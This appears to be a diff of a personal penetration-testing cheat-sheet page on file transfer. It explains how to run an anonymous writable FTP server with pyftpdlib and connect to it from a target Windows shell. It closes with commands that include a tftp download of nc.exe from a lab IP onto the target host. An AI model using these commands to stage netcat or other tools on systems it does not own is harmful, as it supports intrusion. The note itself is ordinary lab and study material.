Cyb3rW1z4rd/CyberBook/File transfer.md

 ### FTP

-`Python ftp\ - python -m pyftpdlib -w -p 21` the best way i've found for file transfer on MOST machines is to just use plain old ftp. just about every windows machine has it installed by default, and you can get a really good quick and easy python script "`pip install pyftpdlib` or `pip3 install pyftpdlib`" once pyftpdlib is installed, just run it in the directory you want to download files to with "`python -m pyftpdlib -w -p 21`" then on your client machine type ftp -A your.ip.add.ress (the -A is for Anonymous, these shells will hang on user/password entry sometimes, don't use this option with linux machines though) and you're ready to transfer files!
+`Python ftp\ - python -m pyftpdlib -w -p 21`

+The best way i've found for file transfer on MOST machines is to just use plain old ftp. just about every windows machine has it installed by default, and you can get a really good quick and easy python script.

+ "`pip install pyftpdlib` or `pip3 install pyftpdlib`" once pyftpdlib is installed, just run it in the directory you want to download files to with "`python -m pyftpdlib -w -p 21`" then on your client machine type ftp -A your.ip.add.ress (the -A is for Anonymous, these shells will hang on user/password entry sometimes, don't use this option with linux machines though) and you're ready to transfer files!

 `python -m pyftpdlib -w -p 21` or `python3 -m pyftpdlib -w`

 `ftp -s:input.txt`

 `tftp -i 10.11.0.126 get nc.exe`